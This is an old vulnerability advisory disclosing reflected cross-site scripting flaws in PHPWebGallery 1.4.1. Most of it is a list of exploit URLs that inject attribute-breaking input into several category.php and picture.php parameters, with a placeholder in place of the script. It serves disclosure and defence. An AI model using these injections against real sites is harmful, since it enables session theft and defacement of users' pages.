PHPWebGallery Multiple Cross Site Scripting Vulnerabilities

2006-04-11T00:00:00
ID SECURITYVULNS:DOC:12157
Type securityvulns
Reporter Securityvulns
Modified 2006-04-11T00:00:00

Description

Title : PHPWebGallery Multiple Cross Site Scripting Vulnerabilities Author: Mourad aka Psych0 <root__ at linuxmail org> Moroccan Security Team Vendor: www.phpwebgallery.net Software: PHPWebGallery Version: 1.4.1

category.php and picture.php scripts are vulnerable to XSS attacks.

Exploits:

http://target/phpwebgallery_dir/category.php?cat=">[xss]

http://target/phpwebgallery_dir/category.php?cat=">[xss]&num=0

http://target/phpwebgallery_dir/category.php?cat=1&num=">[xss]

http://target/phpwebgallery_dir/category.php?cat=">[xss]&search=date_available%3A2006-01-01

http://target/phpwebgallery_dir/category.php?cat=1&search=">[xss]

http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&slideshow=">[xss]

http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&show_metadata=">[xss]

http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&start=">[xss]